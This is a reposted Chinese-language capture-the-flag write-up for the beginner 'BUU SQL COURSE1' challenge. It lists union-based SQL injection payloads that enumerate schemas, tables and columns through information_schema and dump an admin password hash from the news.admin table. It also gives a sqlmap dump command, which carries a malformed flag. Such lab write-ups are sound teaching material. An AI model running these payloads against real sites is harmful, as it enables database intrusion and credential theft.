当前位置：网站首页>[Writeup]BUU SQL COURSE1[入门级]

[Writeup]BUU SQL COURSE1[入门级]

2022-06-12 14:18:00 【_小飒】

观察网址，好像找到注入点

http://70e2a79f-6017-4286-b07f-1729220b2c7d.node4.buuoj.cn:81/#/content/-1 union select 1,2

/-1 union select 1,(
select group_concat(schema_name) from information_schema.schemata
)

获得数据库
ctftraining

获得表名

-1 union select 1,(
select group_concat(table_name) from information_schema.tables where table_schema="ctftraining"
)

FLAG_TABLE

获得列名

-1 union select 1,(
select group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name='FLAG_TABLE'
)

FLAG_COLUMN

获得数据时发现数据是空的，只能想另外办法
看能不能登录

news的数据库下找到 admin的密码：67fef29ef7beb75f567587f135fa26a0
获得flag
payload：

-1 union select 1,(
select group_concat(password) from news.admin
)

在这里插入图片描述

使用sqlmap
burp里直接可以找到注入点
在这里插入图片描述

python sqlmap -u url  -D ”news” --dump-a

版权声明
本文为[_小飒]所创，转载请带上原文链接，感谢
https://blog.csdn.net/Yjlay/article/details/125181023